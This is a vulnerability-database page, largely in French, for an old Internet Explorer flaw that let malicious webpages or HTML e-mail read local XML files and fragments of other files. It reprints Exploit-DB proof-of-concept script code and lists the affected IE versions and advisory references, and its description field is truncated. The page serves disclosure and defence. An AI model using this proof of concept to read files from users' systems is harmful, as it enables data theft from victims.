Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The legacy
Informations sur l'Exploit
Exploit Database EDB-ID : 21749
Date de publication : 2002-08-22 22h00 +00:00
Auteur : GreyMagic Software
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/5560/info
A flaw in Microsoft Internet Explorer may reveal the entire contents of XML files and partial contents of other files to attackers. This vulnerability allows an attacker to read the entire contents of XML files, and fragments of other files, existing in a known location, from a victim user's system.
This vulnerability can be exploited via a malicious webpage or via malicious HTML e-mail. Other applications that use the Internet Explorer engine are affected as well (Outlook, MSN Explorer, etc.).
<script language="xml" src="getFile.asp" id="oFile"></script>
<script language="jscript">
onload=function () {
var oXD=oFile.XMLDocument,
oPE=oXD.parseError;
alert(
oXD.firstChild || oPE.line>0 ?
"File found!\n"+
"Details:\n\n"+
(oXD.xml || "Line "+oPE.line+" contains '"+oPE.srcText+"'")
:
"File does not exist or could not be retrieved."
);
}
</script>
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version 5.01
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.01
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.01
- Microsoft>>Internet_explorer >> Version 5.01 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.5
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.5
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.5
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 6.0
- Microsoft>>Internet_explorer >> Version 6.0 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 6.0 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 6.0 (Open CPE detail)
Références
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-047
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1207
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1026
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A776
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1148
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A608
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
